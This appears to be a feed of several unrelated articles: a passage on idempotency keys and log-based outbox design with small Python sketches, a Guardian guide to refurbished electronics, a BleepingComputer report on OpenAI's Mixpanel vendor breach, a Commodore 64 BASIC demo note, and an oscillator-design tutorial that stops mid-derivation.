We can somewhat improve this situation by adding a timestamp to the idempotency key, for instance by using a
UUIDv7
which contains both a timestamp part (first 48 bits) and a random part (remaining bits), or an
ULID
. That way, the consumer can detect when it receives a message with an idempotency key which is "too old". While it can’t decide whether the message is a duplicate or not, it can flag to the producer that it can’t handle that message. It is then upon the producer to decide how to proceed. For instance, if the message is part of a payment flow, the system might suggest to the user to first check in their banking account whether this payment has already been executed or not. Only if that’s not the case, a
new
message with the same payload and a fresh UUID would be sent.
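As an illustration, a consumer might implement the staleness check along these lines (a sketch in Python; the one-week retention window is an arbitrary example):

    import time
    import uuid

    MAX_AGE_MS = 7 * 24 * 60 * 60 * 1000  # example retention window: one week

    def is_too_old(idempotency_key: str) -> bool:
        # A UUIDv7 carries the Unix timestamp in milliseconds in its first 48 bits.
        ts_ms = int.from_bytes(uuid.UUID(idempotency_key).bytes[:6], "big")
        return time.time() * 1000 - ts_ms > MAX_AGE_MS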
Monotonically Increasing Sequences
All these intricacies can be avoided when it is possible to use a monotonically increasing sequence value as the idempotency key. In that case, the consumer does not need to store all the keys it ever has processed (or a reasonably sized subset thereof). It only needs to store a single value, the one of the latest message which it has processed. If it receives a message with the same or a lower idempotency key, that message must be a duplicate and can be ignored. When receiving messages from a partitioned source, such as a Kafka topic with multiple partitions, or from multiple independent producers (e.g., different clients of a REST API, each using their own separate sequence), then the latest key value per partition must be stored.
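A sketch of what this check looks like on the consumer side, assuming integer keys scoped per partition; in practice the watermark would be persisted in the same transaction as the processed data rather than kept in memory:

    # Latest processed key per partition; -1 means "nothing processed yet".
    high_watermarks: dict[str, int] = {}

    def is_duplicate(partition: str, key: int) -> bool:
        if key <= high_watermarks.get(partition, -1):
            return True  # same or lower key: must be a redelivery
        high_watermarks[partition] = key
        return False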
Monotonically increasing idempotency keys are a great improvement from the perspective of the message consumer. On the flipside, they may make things more complicated for producers: creating monotonically increasing sequence values isn’t without its own challenges. It is trivial if producers are single-threaded, producing one message at a time. In that case, a database sequence, or even a simple in-memory counter, can be used for creating the idempotency keys. Gaps in the sequence are fine, hence it is possible to increment the persistent state of the sequence or counter in larger steps, and dispense the actual values from an in-memory copy. That way, disk IO can be reduced. From a consumer perspective, Kafka partition offsets fall into that bucket, as they can be considered a monotonically increasing idempotency key for the messages consumed from a given partition.
Things get more complicated when the producer is subject to multiple concurrent requests at once, for instance a REST service with multiple request workers, perhaps even scaled out to multiple compute nodes in a cluster. To ensure monotonicity, retrieval of the idempotency key and emitting a message with that key must happen atomically, uninterrupted by other worker threads. Otherwise, you may end up in a situation where thread A fetches sequence value 100, thread B fetches sequence value 101, B emits a message with idempotency key 101, and then A emits a message with idempotency key 100. A consumer would then, incorrectly, discard A’s message as a duplicate.
For most cases, ensuring this level of atomicity will impose a severe bottleneck, essentially serializing all requests of the producer system, regardless of how many worker threads or service
instances you deploy. Note that if you really wanted to go down that route, solely using a database sequence for producing the idempotency key will not work. Instead, you’d have to use a mechanism such as
Postgres advisory locks
in order to guarantee monotonicity of idempotency keys in the outgoing messages.
Deriving Idempotency Keys From the Transaction Log
Now, is there a way for us to have this cake and eat it too? Can we get the space efficiency for consumers when using monotonically increasing idempotency keys, without hampering performance of multi-threaded producers? Turns out we can, at least when the emission of messages can be made an asynchronous activity in the producer system, happening independently from processing inbound requests.
This means clients of the producer system receive confirmation that the intent to send a message or request was persisted, but they don’t get the result itself right away.
If a use case can be modeled with these semantics, the problem can be reduced to the single-threaded situation above: instead of emitting messages directly to the target system, each producer thread inserts them into a queue. This queue is processed by a single-threaded worker process which emits all the messages sequentially. As argued in
The Synchrony Budget
, making activities asynchronous can be generally advantageous, if we don’t require their outcome right away.
One specific way to do so would be a variation of the widely used
outbox pattern
, utilizing the transaction log of the producer service’s database. After all, it’s not necessary to sequence inbound requests ourselves as the database already is doing that for us when serializing the transactions in its log. When producers persist the intent to send a message in the transaction log—for instance by writing a record into a specific table—a process tailing the log can assign idempotency keys to these messages based on their position in the transaction log.
An implementation of this is straight-forward using tools for log-based Change Data Capture (CDC), such as
Debezium
: You retrieve the messages to be sent from the log by capturing the INSERT events from the outbox table, and assign an idempotency key before emitting them, derived from their log offset. The exact details are going to depend on the specific database.
For example, in Postgres
it is ensured
that the log sequence numbers (LSN) of commit events within its write-ahead log (WAL) are monotonically increasing: the commit event of a transaction committing after another transaction will have a higher LSN. Furthermore, it is guaranteed that within a given transaction, the LSNs of the events are also monotonically increasing. This makes the tuple of
{ Commit LSN, Event LSN }
a great fit for an idempotency key. In order to not leak the fact that a producer is using a Postgres database, both values can be encoded into a single 128-bit value. Note that you don’t need to deploy Kafka or Kafka Connect for this solution. Debezium’s
embedded engine
is a great fit for this use case, allowing you to assign idempotency keys from within a callback method in the producer service itself, not requiring any further infrastructure.
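One possible encoding, sketched in Python: packing the commit LSN into the high 64 bits keeps keys ordered by commit order, with the event LSN breaking ties within a transaction.

    def idempotency_key(commit_lsn: int, event_lsn: int) -> int:
        # Both LSNs are 64-bit values; the result fits into a single
        # 128-bit integer that doesn't look Postgres-specific to consumers.
        return (commit_lsn << 64) | event_lsn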
When using Postgres to implement this pattern, you don’t even need a dedicated outbox table, as it lets you write arbitrary contents into the transaction log via
pg_logical_emit_message()
, which is perfect for the use case at hand.
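A minimal producer-side sketch using the psycopg driver; the 'outbox' prefix is an arbitrary label that the CDC side would filter on:

    import json
    import psycopg

    def enqueue(conn: psycopg.Connection, payload: dict) -> None:
        # pg_logical_emit_message(transactional, prefix, content) writes the
        # payload into the WAL only; no outbox table is involved.
        with conn.cursor() as cur:
            cur.execute(
                "SELECT pg_logical_emit_message(true, 'outbox', %s)",
                (json.dumps(payload),),
            )
        conn.commit()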
Discussion
So, when to use which kind of idempotency key then?
As always, there are no silver bullets, and the answer depends on your specific use case.
For many scenarios, using UUIDs and dropping them after some time will probably be sufficient,
provided you can tolerate that messages occasionally can be processed a second time when duplicates arrive after the retention period of processed keys.
The more messages you need to process overall,
the more attractive a solution centered around monotonically increasing sequences becomes,
as it allows for space-efficient duplicate detection and exclusion, no matter how many messages you have.
The proposed log-based approach can be an efficient solution for doing so,
but it also adds operational complexity:
your database needs to support logical replication,
you need to run a CDC connector, etc.
However, many organizations already operate CDC pipelines for other purposes
(analytics, search indexing, cache invalidation, etc.). If you’re in that category,
the incremental complexity is minimal. If you’re not, you should weigh the operational
overhead against the benefits (constant-space duplicate detection) for your specific scale.
Don’t buy new tech this Black Friday: expert tips for buying refurbished phones and laptops
Guardian
www.theguardian.com
2025-11-27 12:00:25
Tech is on its last legs? Refurbished can be the cheaper, greener option. Here’s how to choose well and avoid the pitfalls • How to shop smart this Black Friday• How to make your phone last longer Even if you do your best to avoid it, it’s hard to escape the noise of retailers offering implausible-s...
Even if you do your best to avoid it, it’s hard to escape the noise of retailers offering implausible-seeming Black Friday discounts on desirable technology. What they won’t be so keen to highlight is the huge environmental cost that comes from feeding the capitalist beast year on year, given what an obvious sales vibe-killer it would be.
While the best approach for the planet is to opt out completely and observe the alternate holiday of
Buy Nothing Day
instead, such an approach can prove self-defeating to your finances in the long term. If you
shop smart on Black Friday
and avoid the lure of impulse buys, it’s a good time to stock up on the things you need, at lower prices than at the rest of the year.
In other words, if your phone, laptop or TV is on its figurative last legs, Black Friday is a sensible time to seek a replacement. But if you’re hoping to limit your ecological impact, it’s definitely worth considering refurbished options.
“As a consumer, you save directly 30-40% versus new, and you also have this feeling of doing the right thing,” says Peter Windischhofer, co-founder and CEO of
Refurbed
. “Because you buy a product that already exists, you don’t have to produce a new one.”
James Rigg, CEO of Trojan Electronics, agrees: “Very often, it’s the better choice: reliable performance, lower prices and a fraction of the environmental cost.
“Buy from someone reputable, look for transparency, and prioritise warranty and repairability over a too-good-to-be-true discount, and you can come out of Black Friday with great devices and a lighter footprint.”
Five tips when buying refurbished
Read the description
Refurbished can mean different things. See what condition is promised, paying special attention to battery health.
Check the warranty and returns policy
You want to know that you’re in good hands should anything go wrong.
Research the seller’s reputation
Look at customer reviews and internet feedback. If on eBay, look for sellers in the company’s
Refurbished
programme.
Research your chosen device
The older the device, the bigger the discount – but this is a false economy if you have to replace it sooner. With phones and laptops, especially, make sure they’re getting updates and will be able to cope with years of use.
Don’t cheap out
A low price is only a bargain if it actually delivers. Prioritise customer service and a transparent refurbishment process over saving a few pounds.
Refurbished vs pre-owned
The process of buying refurbished electronics is often as good as buying new.
Photograph: dikushin/Getty Images
It’s important at this point to define terms. People sometimes use the phrases “preowned”, “secondhand” and “refurbished” interchangeably, which may have given the latter a bad rap.
“They really are quite, quite different,” says Katy Medlock, Back Market’s UK general manager. “Secondhand could be peer to peer: you’re not buying it with a warranty, it hasn’t been through a quality check, you’re not buying it with all the mod cons.”
That separates refurbished marketplaces such as
Back Market
,
MusicMagpie
,
Refurbed
and others from sites where you buy directly from a member of the public, such as Facebook Marketplace or Craigslist. “Our mission is all about trying to make the process of buying refurbished electronics as good as buying something new,” Medlock says, highlighting the ability Back Market offers to split payments, its 30-day money-back promise, 12-month warranty and next-day delivery as ways of seeking parity with retailers shipping new stock.
By contrast, buying preowned or secondhand on the private market is a gamble, even if you sidestep the risk of being scammed.
“I’ve heard so many horror stories from peer-to-peer when it comes to electronics,” says Windischhofer. “I love using those platforms for low-value products; I use a lot of Vinted for clothing, and it’s great. But for electronics, my advice would be to go through a professional where you get a warranty and an invoice, and where, in case this product breaks after five days, they have great customer service to really help you out.”
Items sold privately may also have unseen defects or botched repairs using cheap, third-party parts. “There’s a very different performance from the cheapest phone screen that can be put on a phone and the correct screen,” says Murdock. “Products get traded in at times with a $20 screen on an iPhone or Samsung [device] that really should have a wholesale cost of $150. They’re almost illegible.”
In other words, peer-to-peer buys are a gamble. If you insist on taking that risk, it’s best to buy in person and to take the opportunity to check both the screen and camera alongside signs of cosmetic wear and tear. If buying an iPhone or Android device, check the battery’s health in the phone’s settings and make sure it’s at least 80%.
If buying peer-to-peer on eBay, rather than through a certified refurbished seller, Williams encourages shoppers to look through the feedback and study photos and the product description. “Is this a reliable seller? Have they sold a lot of things in the past? What’s their feedback score? These are all things that are helpful to know that they’ve had good transactions with buyers in the past.”
Crunching the numbers
Buying refurbished tech can shrink your e-waste footprint.
Photograph: Pituk Loonhong/Getty Images
What does that ecological improvement look like in real terms? Let’s take smartphones – the bestselling refurbished category.
According to
research from Back Market
, buying a refurbished model rather than a new one will save 178g of e-waste and 77,000 litres of water, while preventing 77kg of carbon emissions and 244kg of raw materials from being mined.
Trojan Electronics, meanwhile,
estimates
that a refurbished smartphone uses 91.3% fewer raw materials and 86.4% less water while putting 91.6% less carbon emissions into the atmosphere compared with buying a new device.
Plenty of variables make the exact figures impossible to pin down. But while there’s still an impact from refurbished buys – especially if a new battery or screen is installed as part of the refurbishing process – there’s no denying that the harm is lessened.
“Every time you buy a smartphone, it’s about a 58kg CO2 offset if you don’t buy a new one [and instead] buy one that’s been refurbished,” says James Murdock, co-founder of
Alchemy
, a company that refurbishes old technology for resale. “That includes the operation to actually refurbish it, and the existence of our business. It’s even more if you’re buying a laptop.”
It’s not just phones, either. “Now, people are turning to all different types of electronics, everything from refurbished air fryers through to hair accessories, TVs, coffee machines, ice-cream makers and games consoles,” says Eve Williams, general manager at eBay UK. Unlike its traditional peer-to-peer sales business, eBay has a method by which it
certifies refurbished-reselling businesses
.
“There’s nothing to lose [from buying refurbished],” she says, pointing out that if you get the same 12-month guarantee as you would if buying new, you’re getting the same product at a cheaper price. “You’re getting something that otherwise would have ended up in landfill. We have this amazing seller called
Preloved Tech
. Matt and Andrea, who run it, started their business by working in schools, going in and seeing the times that schools were throwing out laptops and iPads because they didn’t know what to do with them. There are no rules around what some businesses should do to get rid of or recycle technology.
“They’re taking a lot of that tech and are able to give money and funding back to the schools, while also then being able to refurbish these items to sell on, and extend the life of them.”
Avoid smartphones that have stopped receiving security updates.
Photograph: Tim Robberts/Getty Images
“The best advice I can give for buying refurbished is to go via established retailers such as
Back Market
,
Giffgaff
and
Vodafone
, and if you’re buying through eBay then try to get a device that’s listed as ‘certified refurbished’,” says technology journalist Thomas Deehan. “You can also find different perks available depending on where you buy. For instance, Giffgaff provides a two-year warranty on ‘like new’ phones, while Back Market often gives you the option to have an entirely new battery fitted into your device of choice.”
In general, the more information a retailer provides about their refurbishing process, the better. “A proper refurbisher will tell you exactly what’s been checked, what’s been replaced, and how the product is graded,” says Rigg. “If you see vague descriptions like ‘used’ or ‘open box’ with no explanation, that’s your cue to walk away.”
Jon Miller, chief commercial officer at MusicMagpie, agrees. “As a rule of thumb, it’s far wiser to be careful when buying refurbished tech. Try to check the warranty length and what exactly that covers. Similarly, check the fine print and ensure ‘refurbished’ means the tech has been properly restored and tested, not just used.”
Is there any preowned technology you should avoid? “If you had asked me that question 10 years ago, I would have said: ‘Yes, because technology is so fast and, you know, the new iPhone is so much better than the last one,’” says Windischhofer. “But now? I don’t think there’s any product that I would buy new. I would always buy the generation before that.”
Alchemy, similarly, practices what it preaches. “We’ve got hundreds of MacBooks, iPhones and other products in the company. We have about 350 employees, and no one, including me, has ever had a new one,” says Murdock.
There are limits, however, to how old a device you should get, and it varies by category. A
PlayStation 4
will continue to play all disc-based games made for it indefinitely, but something internet-reliant may end up losing functionality with time. Older OLED TVs, too, are considered more prone to burn-in than their modern counterparts.
Equally, buying a five-year-old refurbished phone will be cheaper than buying last year’s model, but if you end up needing to replace it sooner – for example, if it’s an Android that’s stopped receiving security updates – then it’s a false economy.
“It might be tempting to get an old MacBook Air from 2015, but it won’t receive regular updates like M-series MacBooks will,” says Deehan. “I think there’s a good balance to strike where you sometimes buy things new and other times go down the refurbished route. It’s about saving money where it makes sense so that you have the freedom to spend a bit more on a device that you’ll make the most of.”
Finally, don’t forget the age-old adage of “buy cheap, buy twice”. Or, as Rigg puts it: “A gadget that fails quickly and can’t be repaired is only cheap for about five minutes.”
“Don’t be tempted by the cheapest offshore, interesting-looking eBay seller that looks like it’s been there for five minutes,” says Murdock. “Buy from a legitimate-looking local partner that’s offering a warranty, as they would with any other kind of new product, and is willing to stand behind that.”
If you plan to resell your old devices, giving them a good clean will make them look their best.
Photograph: MDV Edwards/Getty Images
So you’ve bought a refurbished phone, laptop or tablet and now have one that’s surplus to requirements. What should you do?
Recycling is an option, but one that should be considered a last resort, according to Medlock, especially as there are limits on capacity. “With the amount of new electronics that are produced every year … there’s no way that … the amount sold in the UK could ever be recycled.”
Many sites will offer a trade-in when you buy the replacement, which will increase the likelihood of a device getting a second lease of life in the refurbished ecosystem.
Alternatively, you could take it to
CeX
or try your luck on the peer-to-peer market through
Gumtree
,
Facebook Marketplace
,
Craigslist
or
eBay
. If you go down this route, do be sure to wipe all your personal data first and give it a good spruce-up.
“This should go without saying, but prior to being listed or sold, your tech should be given a good clean to make it look the best that it can,” says Deehan. “Some retailers will dock the value of your device based on its cosmetic appearance, so make sure to do your part in keeping it all lint- and fingerprint-free.”
Donating is also an option. I recently donated an old laptop to
Screen Share
, which repurposes computers and phones for refugees to help tackle digital exclusion, and a quick search online will uncover many other worthwhile places to donate.
Whatever you choose, Medlock suggests putting some thought into the end of life for today’s Black Friday tech buys. “If people are upgrading, the pathway is obviously to buy refurbished … and encouraging people at that point to buy better.
“There is a cost saving there, so people can use that saving to buy devices that last longer, are built to last and built to be repaired.”
Alan Martin
has more than a decade’s experience of writing about and reviewing consumer technology. He once had to strip off to retrieve a battery-depleted drone from a freezing cold
south London lake, showing his deranged devotion to the career. Nearby swans were left confused.
OpenAI discloses API customer data breach via Mixpanel vendor hack
Bleeping Computer
www.bleepingcomputer.com
2025-11-27 11:27:06
OpenAI is notifying some ChatGPT API customers that limited identifying information was exposed following a breach at its third-party analytics provider Mixpanel. [...]...
OpenAI is notifying some ChatGPT API customers that limited identifying information was exposed following a breach at its third-party analytics provider Mixpanel.
Mixpanel offers event analytics that OpenAI uses to track user interactions on the frontend interface for the API product.
According to the AI company, the cyber incident affected “limited analytics data related to some users of the API” and did not impact users of ChatGPT or other products.
“This was not a breach of OpenAI’s systems. No chat, API requests, API usage data, passwords, credentials, API keys, payment details, or government IDs were compromised or exposed,”
OpenAI says
in a press release.
Mixpanel
reported
that the attack “impacted a limited number of our customers” and resulted from a smishing (SMS phishing) campaign that the company detected on November 8.
OpenAI received details of the affected dataset on November 25 after being informed of Mixpanel’s ongoing investigation.
The AI company notes that the exposed information may include:
Name that was provided to us on the API account
Email address associated with the API account
Approximate coarse location based on API user browser (city, state, country)
Operating system and browser used to access the API account
Referring websites
Organization or User IDs associated with the API account
Because no sensitive credentials were exposed, users do not need to reset passwords or regenerate API keys.
Some users are
reporting
that CoinTracker, a cryptocurrency portfolio tracker and tax platform, has also been impacted, with exposed data also including device metadata and limited transaction count.
OpenAI has started an investigation to determine the full scope of the incident. As a precaution, it has removed Mixpanel from its production services and is notifying organizations, administrators, and individual users directly.
While OpenAI underlines that only users of its API are impacted, it notified all its subscribers.
The company warns that the leaked data could be leveraged in phishing or social-engineering attacks and advises users to watch for credible-looking malicious messages related to the incident.
Messages containing links or attachments should be verified to ensure they originate from an official OpenAI domain.
The company also urges users to enable 2FA and never send sensitive information, including passwords, API keys, or verification codes, through email, text, or chat.
Mixpanel’s CEO, Jen Taylor, said that all impacted customers have been contacted directly. “If you have not heard from us, you were not impacted,” she noted.
In response to the attack, Mixpanel secured affected accounts, revoked active sessions and sign-ins, rotated compromised credentials, blocked the threat actor’s IP addresses, and reset passwords for all employees. The company has also implemented new controls to prevent similar incidents in the future.
After a long search I've finally figured out how to embed Commodore 64 BASIC listings into blog posts.
This isn't a game, just a visual demo showing off some of the C64's capabilities. It's taken from two one-line programs in the 1985 Special Issue of Run magazine, posted by L.F.S. and Glenn Zuch. I've combined them.
Okay, a few notes here. First off, the Commodore 64 keyboard had special keys for setting and changing color. These are hard to convey in printed listings, so the convention is to use {} brackets and indicate what keys should be pressed.
{yellow}
is a special character on the 8 key accessed by hitting control+8; this turns the following output yellow.
{up}{down}{left}
and
{right}
are the cursor keys. You get them by hitting those keys. They move the on-screen cursor, changing where the next character will print.
{reverse on}
is control+9, and that basically reverses the color of the next printed character; a space will be a full color "block", etc.
Peek and Poke show up as commands in a few different 8-bit BASICs... what they do is let you look at (peek) or change (poke) memory addresses directly. This is different for every computer model, of course, and it isn't obvious what exactly they do without a memory reference chart.
Poke 53280
lets us directly change the color of the "frame" around our graphics window, and
53281
lets us change the color of the background itself.
The
? mid$
line chooses one of the cursor direction codes we have at random, making the asterisk appear to burrow in a random direction each update.
So, a simple program that crams a lot into two lines. The original was line 2; I adapted line 1 (changing the colors) from another one-liner to make the colors pop a bit more.
There’s an old electronics joke that if you want to build an oscillator, you should try building an amplifier. One of the fundamental criteria for oscillation is the presence of signal gain; without it, any oscillation is bound to decay, just like a swing that’s no longer being pushed must eventually come to a stop.
In reality, circuits with gain can occasionally oscillate by accident, but it’s rather difficult to build a good analog oscillator from scratch. The most common category of oscillators you can find on the internet is circuits that don’t work reliably. This is followed by approaches that require exotic components, such as center-tapped inductors or incandescent lightbulbs. The final group are the layouts you can copy, but probably won’t be able to explain to a friend who doesn’t have an EE degree.
In today’s article, I wanted to approach the problem in a different way. I’ll assume that you’re up-to-date on some of the key lessons from earlier articles: that you
can tell the difference between voltage and current
, have a
basic grasp of transistors
, and know what happens when a
capacitor is charged through a resistor
. With this in mind, let’s try to construct an oscillator that’s easy to understand, runs well, and has a predictable operating frequency. Further, let’s do it without peeking at someone else’s homework.
The simplest form of an oscillator is a device that uses negative feedback to cycle back and forth between two unstable states. To illustrate, think of a machine equipped with a light sensor and a robotic arm. In the dark, the machine is compelled to stroll over to the wall switch and flip it on. If it detects light, another part of its programming takes over and toggles the switch off. The machine is doomed to an endless cycle of switch-flipping at a frequency dictated by how quickly it can process information and react.
At first blush, we should be able to replicate this operating principle with a single n-channel MOSFET. After all, a transistor can be used as an electronically-operated switch:
A wannabe oscillator.
The transistor turns on when the voltage between its gate terminal and the source leg (
Vgs
) exceeds a certain threshold, usually around 2 V. When the power supply first ramps up, the transistor is not conducting. With no current flowing through, there’s no voltage drop across the resistor, so
Vgs
is pulled toward the positive supply rail. Once this voltage crosses about 2 V, the transistor begins to admit current. It stands to reason that the process shorts the bottom terminal of the resistor to the ground and causes
Vgs
to plunge to 0 V. If so, that would restart the cycle and produce a square wave on the output leg.
In practice, this is not the behavior you’ll see. For a MOSFET, the relationship between
Vgs
and the admitted current (
Id
) is steep, but the device is not a binary switch:
BS170 Vgs-Id curve for Vds = 1 V. Captured by author.
In particular, there is a certain point on that curve, somewhere in the vicinity of 2 V, that corresponds to the transistor only admitting a current of about 300 µA. From Ohm’s law, this current flowing through a 10 kΩ resistor will produce a voltage drop of 3 V. In a 5 V circuit, this puts
Vgs
at 5 V - 3 V = 2 V. In other words, there exists a stable equilibrium that prevents oscillation. It’s akin to our robot-operated light switch being half-on.
To fix this issue, we need to build an electronic switch that has no stable midpoint. This is known as
Schmitt trigger
and its simple implementation is shown below:
A discrete-transistor Schmitt trigger.
To analyze the design, let’s assume the circuit is running off
Vsupply = 5
V. If the input signal is 0 V, the transistor on the left is not conducting, which pulls
Vgs
for the other MOSFET all the way to 5 V. That input allows nearly arbitrary currents to flow through the right branch of the circuit, making that current path more or less equivalent to a two-resistor voltage divider. We can calculate the midpoint voltage of the divider:
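Writing R2 for the resistor at the top of the right branch (as in the later discussion) and Rs for the common resistor at the bottom (a label assumed here), this works out to:

\(V_s = V_{supply} \cdot \frac{R_s}{R_2 + R_s} \approx 0.45\ \mathrm{V}\)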
This voltage is also propagated to the source terminal of the input transistor on the left. The actual
Vth
for the
BS170
transistors in my possession is about 2.15 V, so for the input-side transistor to turn on, the supplied signal will need to exceed
Vs + Vth ≈
2.6 V in reference to the ground. When that happens, a large voltage drop appears across R1, reducing the
Vgs
of the output-side transistor below the threshold of conduction, and choking off the current in the right branch.
At this point, there’s still current flowing through the common resistor on the bottom, but it’s now increasingly sourced via the left branch. The left branch forms a new voltage divider; because R1
has a higher resistance than R2,
Vs
is gradually reduced, effectively bumping up
Vgs
for the left transistor and thus knocking it more firmly into conduction even if the input voltage remains constant. This is a positive feedback that gives the circuit no option to linger in a half-on state.
Once the transition is complete, the voltage drop across the bottom resistor is down from 450 mV to about 50 mV. This means that although the left transistor first turned on when the input signal crossed 2.6 V in reference to the ground, it will not turn off until the voltage drops all the way to 2.2 V — a 400 mV gap.
This circuit lets us build what’s known as a
relaxation oscillator
. To do so, we only need to make two small tweaks. First, we need to loop an inverted output signal back onto the input; the most intuitive way of doing this is to add another transistor in a switch-like configuration similar to the failed design of a single-transistor oscillator mentioned earlier on. This building block, marked on the left, outputs
Vsupply
when the signal routed to the gate terminal is 0 V, and produces roughly 0 V when the input is near
Vsupply
:
A Schmitt trigger oscillator.
Next, to set a sensible oscillation speed, we need to add a time delay, which can be accomplished by charging a capacitor through a resistor (middle section). The resistor needs to be large enough not to overload the inverter stage.
For the component values shown in the schematic, the circuit should oscillate at a frequency of almost exactly 3 kHz when supplied with 5 V:
An oscilloscope trace for the circuit, by author.
The frequency is governed by how long it takes for the capacitor to move
Δv =
400 mV between the two Schmitt threshold voltages:
the “off” point at 2.2 V and the “on” point at 2.6 V.
Because the overall variation in capacitor voltage is small, we can squint our eyes and say that the voltage across the 100 kΩ resistor is nearly constant in every charge cycle. When the resistor is connected to the positive rail,
V
R
≈ 5 V – 2.4 V ≈ 2.6 V. Conversely, when the resistor is connected to the ground, we get
V
R
≈ 2.4 V. If the voltages across the resistor are nearly constant, so are the resulting capacitor currents:
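With the 100 kΩ resistor from the schematic, the two quasi-constant currents work out to:

\(I_{charge} \approx \frac{2.6\ \mathrm{V}}{100\ \mathrm{k\Omega}} \approx 26\ \mathrm{\mu A} \qquad I_{discharge} \approx \frac{2.4\ \mathrm{V}}{100\ \mathrm{k\Omega}} \approx 24\ \mathrm{\mu A}\)

Together with the 400 mV swing and the charge and discharge times quoted below, these currents correspond to a timing capacitor of roughly 10 nF.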
From the
fundamental capacitor equation
(
Δv = I · t/C
), we can solve for the charging time needed to move the voltage by
Δv
= 400 mV; the result is about 154 µs for the charging period and 167 µs for the discharging period. The sum is 321 µs, corresponding to a frequency of about 3.1 kHz – pretty close to real life.
The circuit can be simplified to two transistors at the expense of readability, but if you need an analog oscillator with a lower component count, an
operational amplifier
is your best bet.
If you’re rusty on op-amps, I suggest pausing to review the article linked in the preceding paragraph. That said, to understand the next circuit, all you need to know is that an op-amp compares two input voltages and that
Vout
swings toward the positive rail if
Vin+
≫
Vin-
or toward the negative rail if
Vin+
≪
Vin-
.
An op-amp relaxation oscillator.
For simplicity, let’s choose R1 = R2 = R3 and then look at the non-inverting (
Vin+
) input of the chip. What we have here is a three-way voltage divider: the signal on the non-inverting input is a simple average of three voltages:
Vsupply
(5 V), ground (0 V), and
Vout
. We don’t know the value of
Vout
just yet, but it can only vary from 0 V to
Vsupply
, so the
V
in+
signal will always stay between ⅓ ·
Vsupply
and ⅔ ·
Vsupply.
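With R1 = R2 = R3, superposition gives:

\(V_{in+} = \frac{V_{supply} + 0\ \mathrm{V} + V_{out}}{3}\)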
Next, let’s have a look at the inverting input (
Vin-
). When the circuit is first powered on, the capacitor C isn’t charged, so
Vin-
sits at 0 V. Since the voltage on the non-inverting input can’t be lower than ⅓ ·
Vsupply
, this means that on power-on,
Vin+
≫
Vin-
, sending the output voltage toward the positive rail. When
Vout
shoots up, it also bumps the
Vin+
average to ⅔ ·
Vsupply.
Because
Vout
is now high, this starts the process of charging the capacitor through the bottom resistor (R
cap
). After a while, the capacitor voltage is bound to exceed ⅔ ·
Vsupply
. The capacitor voltage is also hooked up to the amplifier’s inverting input, and at that point,
Vin-
begins to exceed
Vin+
, nudging the output voltage lower. Stable equilibrium is not possible because this output voltage drop is immediately reflected in the three-way average present on the
Vin+
leg, pulling it down and causing the difference between
Vin-
and
Vin+
to widen. This positive feedback loop puts the amplifier firmly into the
Vin+
≪
Vin-
territory.
At that point,
Vout
must drop to 0 V, thus lowering the voltage on the non-inverting leg to ⅓ ·
Vsupply
. With
Vout
low, the capacitor starts discharging through R
cap
, but it needs to travel from the current charge state of ⅔ ·
Vsupply
all the way to ⅓ ·
Vsupply
before
Vin-
becomes lower than
Vin+
and the cycle is allowed to restart.
The continued charging and discharging of the capacitor between ⅓ · Vsupply and ⅔ · Vsupply results in periodic oscillation. The circuit produces a square wave signal with a period dictated by the value of C and Rcap. The frequency of these oscillations can be approximated analogously to what we’ve done for the discrete-transistor variant earlier on. In a 5 V circuit with R1 = R2 = R3, the capacitor charges and discharges by Δv ≈ 1.67 V. If Rcap = 10 kΩ, then the quasi-constant capacitor charging current is I ≈ 2.5 V / 10 kΩ ≈ 250 µA.
Knowing Δv and I, and assuming C = 1 µF, we can tap into the capacitor equation (Δv = I · t/C) to solve for t. The result is 6.67 ms. This puts the charge-discharge roundtrip at 13.34 ms, suggesting a frequency of 75 Hz. The actual measurement is shown below:
Oscilloscope trace for the relaxation oscillator. By author.
The observed frequency is about 7% lower than predicted: 70 instead of 75 Hz. Although I could pin this on component tolerances, a more honest explanation is that at Δv ≈ 1.67 V, the constant-current approximation of the capacitor charging process is stretched thin; the segments in the bottom oscilloscope trace diverge quite a bit from a straight line.
Short of reducing R3 to bring down Δv and thus reduce the variations in current, the way to develop a better formula is to tap into the equation for a capacitor charged by a constant voltage via a resistor, as derived here:
\(V_{cap} = V_{in} \cdot (1 - e^{-t \over RC})\)
To make the math simple, we can use ⅓ · Vsupply as the reference point for the calculation. In this view, the “virtual” supply voltage is Vin = ⅔ · Vsupply (because we took away the unused bottom ⅓) and the capacitor is charging from 0 V to Vcap = 50% · Vin (i.e., ⅓ of ⅔).
To find the charging time, we just need to rearrange the R-C formula for the Vcap/Vin ratio, and then solve for t at which the value works out to 50% (0.5):
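Setting the ratio to 0.5 and solving gives a half-period of t = RC · ln 2, so the full charge-discharge cycle corresponds to:

\(f = \frac{1}{2 \cdot RC \cdot \ln 2} \approx \frac{0.72}{RC}\)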
If we plug 1 µF and 10 kΩ into the equation, the value works out to 72 Hz, which is within 3% of the observed behavior, comfortably within the tolerances of standard passive components.
The method outlined earlier on is not the only conceptual approach to building oscillators. Another way is to produce resonance. We can do this by taking a standard op-amp voltage follower, which uses negative feedback to control the output, and then messing with the feedback loop in a particular way.
An op-amp voltage follower.
In the basic voltage follower configuration, the op-amp reaches a stable equilibrium when Vin+ ≈ Vin- ≈ Vout. Again, the circuit works only because of the negative feedback loop; in its absence, Vin- would diverge from Vin+ and the output voltage would swing toward one of the supply rails.
To turn this circuit into an oscillator, we can build a feedback loop that normally provides negative feedback, but that inverts the waveform at a particular sine-wave frequency. This turns negative feedback into positive feedback; instead of stabilizing the output voltage, it produces increasing swings, but only at the frequency at which the inversion takes place.
Such a selective waveform inversion sounds complicated, but we can achieve it with a familiar building block: an R-C lowpass filter. The mechanics of these filters are discussed in this article; in a nutshell, the arrangement produces a frequency-dependent phase shift of 0° (at DC) to -90° (as the frequency approaches infinity). If we cascade a couple of these R-C stages, we can achieve a -180° phase shift at some chosen frequency, which is the same as flipping the waveform.
A minimalistic but well-behaved op-amp solution is shown below:
A rudimentary phase-shift oscillator.
In this particular circuit, an overall -180° shift happens when each of the R-C stages adds its own -60°. It’s easy to find the frequency at which this occurs. In the aforementioned article on signal filtering, we came up with the following formula describing the shift associated with the filter:
\(\theta = -arctan( 2 \pi f R C )\)
Arctangent is the inverse of the tangent function. In a right triangle, the tangent function describes the ratio of lengths of the opposite to the adjacent for a particular angle; the arctangent goes the other way round, giving us an angle for a particular ratio. In other words, if x = tan(α) then α = arctan(x).
This allows us to rewrite the equation as:
\(2 \pi f R C = -tan(\theta)\)
